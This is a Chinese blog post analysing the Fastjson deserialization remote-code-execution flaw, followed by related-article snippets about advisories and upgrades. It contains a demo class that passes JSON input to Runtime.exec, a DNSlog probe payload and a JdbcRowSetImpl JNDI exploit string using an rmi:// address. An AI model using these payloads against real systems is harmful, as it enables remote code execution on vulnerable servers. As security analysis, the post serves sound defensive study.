FastJson反序列化远程命令执行漏洞分析

最新推荐文章于 2022-11-20 23:00:19 发布
最新推荐文章于 2022-11-20 23:00:19 发布
阅读量811 收藏
点赞数
文章标签: 安全 json
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/moshao123/article/details/114638286
版权

FastJson反序列化漏洞分析

文章目录

前言

一、Fastjson的介绍

fastjson一款开源的java项目。采用独创的算法,将parse的速度提升到极致,超过所有json库,包括曾经号称最快的jackson。支持各种JDK类型。JDK 5、JDK 6、Android、阿里云手机等环境。包括基本类型、JavaBean、Collection、Map、Enum、泛型等。代码托管在github.org上,项目地址是 https://github.com/AlibabaTech/fastjson。

二、简单使用

1.将bean对象转换为json

代码如下(示例):

package com.fastjson.test;

import java.io.IOException;

public class User {
    private int age;
    public String name;
    public void sayHello(){
        System.out.println("Hello, I am "+name);
    }
    public void getName(){
        System.out.println(name);
    }

    public int getAge() {
        return age;
    }

    public void setAge(int age){
        this.age = age;
        System.out.println("调用了setAge方法");
    }

    public void setName(String name) throws IOException {
        this.name = name;
        Runtime.getRuntime().exec(this.name);
        System.out.println("调用了setName方法");
    }


}

package com.fastjson.test;

import com.alibaba.fastjson.JSON;
import java.io.IOException;

public class Test {
    public static void main(String[] args) throws IOException {
        User user = new User();
        user.setName("wanghao");
        user.setAge(25);

        String json = JSON.toJSONString(user);
        System.out.println(json);
    }
}

运行结果:

调用了setName方法
调用了setAge方法
{“age”:25,“name”:“wanghao”}

2.将json转换为对象

更改setName函数如下:

    public void setName(String name) throws IOException {
        this.name = name;
        Runtime.getRuntime().exec(this.name);
        System.out.println("调用了setName方法");
    }

调用如下:

        String str = "{\"age\":25,\"name\":\"calc\"}";
        User user = JSON.parseObject(str,User.class);

弹出了计算机
在这里插入图片描述

3.通用性

当使用JSON.parseObject(str,User.class)进行调用的时候,可以控制前端提交的json内容,但是不知道类的名称。这里的核心就是fastjson的@type机制。通过全路径名能指定需要转换的类。

调用方式如下:

        String str1 = "{\"@type\":\"com.fastjson.test.User\",\"age\":25,\"name\":\"calc\"}";
        Object users = JSON.parseObject(str1);

运行结果:
在这里插入图片描述

三、漏洞分析挖掘思路

通过@type指定可以通过lookup做bean查询进行远程jndi注入的函数。
例如:
提交poc如下

String poc = "{\"@type\":\"java.net.Inet4Address\",\"val\":\"zy9fjf.dnslog.cn\"}";
JSON.parseObject(poc);

最终执行java.net.Inet4Address类,查看dnslog如下:
在这里插入图片描述
进一步利用:
exp如下

String poc = "{\"@type\": \"com.sun.rowset.JdbcRowSetImpl\", \"dataSourceName\":\"rmi://127.0.0.1:9999/Exploit\", \"autoCommit\":true}";

调试


跟踪到DefaultJSONParser.class中,通过判断key为@type,就进行了反序列化操作。该位置即可对传入的任意类全路径名通过反射进行实例化操作,并且传入的全路径类名可控。

com.sun.rowset.JdbcRowSetImpl分析
核心位置
在这里插入图片描述getDataSourceName()获取到传入的url传入lookup函数里,lookup函数做远程bean查询。就可以远程进行jndi注入,执行恶意对象。

moshao123
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
35-3 使用dnslog探测fastjson漏洞
weixin_43263566的博客
04-10 307
DNSLog是一种记录在DNS上的域名相关信息的机制,类似于日志文件,记录了对域名或IP的访问信息。因特网采用树状结构的命名方法,按照组织结构划分域,每个域都是名字空间中被管理的一个划分,可以进一步划分为子域。当向DNS服务器发起kxsy.work的解析请求时,DNSLog会记录下此次解析,包括解析的域名和对应的IP地址。刷新dnslog服务器的记录,有记录就说明存在漏洞(一开始的4ax的子域名发送请求,刷新看不到,我就获取一个新的子域名做演示,所以下面的截图中的域名跟上一张不一样)将数据包发送到重发器。
Fastjson反序列化漏洞
Massimo__JAVA的博客
07-16 852
Fastjson是一款广泛应用于Java开发的JSON解析库,它提供了高效、方便、安全的序列化和反序列化功能。通过对Fastjson漏洞的研究,发现在其默认配置下,Fastjson存在高危漏洞,攻击者可以利用该漏洞执行任意代码,从而实现远程代码执行攻击。
预警事项:Fastjson反序列化远程代码执行漏洞风险预警
05-24
阿里巴巴发布关于Fastjson安全公告,在1.2.80及以下版本中存在反序列化风险。Fastjson是阿里巴巴的开源JSON解析库,可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到Java Bean。Fastjson接口简单易用,已经被广泛使用在缓存序列化、协议交互、Web输出、Android客户端等多种应用场景。在默认配置下,当应用或系统用Fastjson对由用户可控的JSON字符串进行解析时,将可能导致远程代码执行的危害。攻击者利用该漏洞可实现在目标机器上的远程代码执行
热门Fastjson 中出现高危RCE漏洞
smellycat000的专栏
06-17 1252
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士网络安全研究员详述了最近修复的位于热门 Fastjson 库中的一个高危漏洞CVE-2022-25845),它可被用于执行远程代码。该漏洞和受支持的特性 “AutoType” 中的不受信任的反序列化有关。项目维护人员已于2022年5月23日在版本1.2.83中将其修复。JFrog 公司的研究员 Uriya Yavnie...
fastjson1.2.69反序列化远程代码执行漏洞介绍.docx
07-01
fastjson1.2.69反序列化远程代码执行漏洞介绍fastjson采用黑白名单的方法来防御反序列化漏洞,导致当黑客不断发掘新的反序列化Gadgets类时,在autoType关闭的情况下仍然可能可以绕过黑白名单防御机制,造成远程命令执行漏洞。经研究,该漏洞利用门槛较低,可绕过autoType限制,风险影响较大。阿里云应急响应中心提醒fastjson用户尽快采取安全措施阻止漏洞攻击
fastjson1.2.8 反序列化远程代码执行漏洞
05-08
astjson采用黑白名单的方法来防御反序列化漏洞,导致当黑客不断发掘新的反序列化Gadgets类时,在autoType关闭的情况下仍然可能可以绕过黑白名单防御机制,造成远程命令执行漏洞。经研究,该漏洞利用门槛较低,可绕过...
springmvc fastjson 反序列化时间格式化方法(推荐)
10-20
下面小编就为大家带来一篇springmvc fastjson 反序列化时间格式化方法(推荐)。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
fastjson反序列化漏洞
qq_56426046的博客
11-20 6887
在这个示例程序中先是构造了⼀个恶意类,然后调⽤toJSONString⽅法序列化对象写⼊@type,将 @type指定为⼀个恶意的类TestTempletaHello的类全名,当调⽤parse⽅法对TestTempletaHello类进⾏ 反序列化时,会调⽤恶意类的构造⽅法创建实例对象,因此恶意类TestTempletaHello中的静态代码块中 就会被执⾏。fastjson在解析json的过程中,⽀持使⽤autoType来实例化某⼀个具体的类,并调⽤该类的set/get⽅法 来访问属性。
安全漏洞Fastjson反序列化漏洞
热门推荐
孤芳不自赏
05-27 1万+
引言 昨天,我收到了集团安全部门的告警消息:Fastjson≤1.2.80版本存在反序列化漏洞,好家伙,着手开搞,这又是一个不眠夜的开始,哦,为什么说“又”呢?还记得去年12月份log4j2报过重大安全漏洞…… 风险描述 fastjson已使用黑白名单用于防御序列化漏洞,经研究该利用在特定条件下可绕过默认autoType关闭限制,攻击远程服务器,风险影响较大。建议fastjson用户尽快采取安全措施保障系统安全 影响版本 Fastjson≤1.2.80 解决方案1:升级到最新版本1.2.83..
NS-2020-0011fastjson 远程代码执行漏洞
勤不了一点
05-24 1118
TAG: fastjson、Jackson-databind、远程代码执行 危害等级: 高,攻击者利用此漏洞,可造成远程代码执行漏洞详情:【漏洞通告】fastjson<=1.2.62远程代码执行漏洞通告 fastjson是阿里巴巴的开源JSON解析库,在特定条件下可绕过默认autoType关闭限制,从而反序列化安全风险的类,攻击者利用该漏洞可实现在目标机器上的远程代码执行 临时处理:【漏洞通告】fastjson<=1.2.62远程代码执行漏洞通告 升级处理
Fastjson反序列化远程代码执行漏洞
小云很优秀
05-24 443
5月23日,绿盟科技CERT监测到Fastjson官方发布公告称在1.2.80及以下版本中存在新的反序列化风险,在特定条件下可绕过默认autoType关闭限制,从而反序列化安全风险的类,攻击者利用该漏洞可实现在目标机器上的远程代码执行。 参考链接:https://github.com/alibaba/fastjson/wiki/security_update_20220523 影响范围 受影响版本 Fastjson ≤ 1.2.80 解决方案 升级到最新版本1.2.83 下载链接:https://.
fastjson <= 1.2.80 反序列化任意代码执行漏洞
最新发布
09-02
- *1* [fastjson1.2.8 反序列化远程代码执行漏洞](https://download.csdn.net/download/xiazai_ceshi/18466350)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值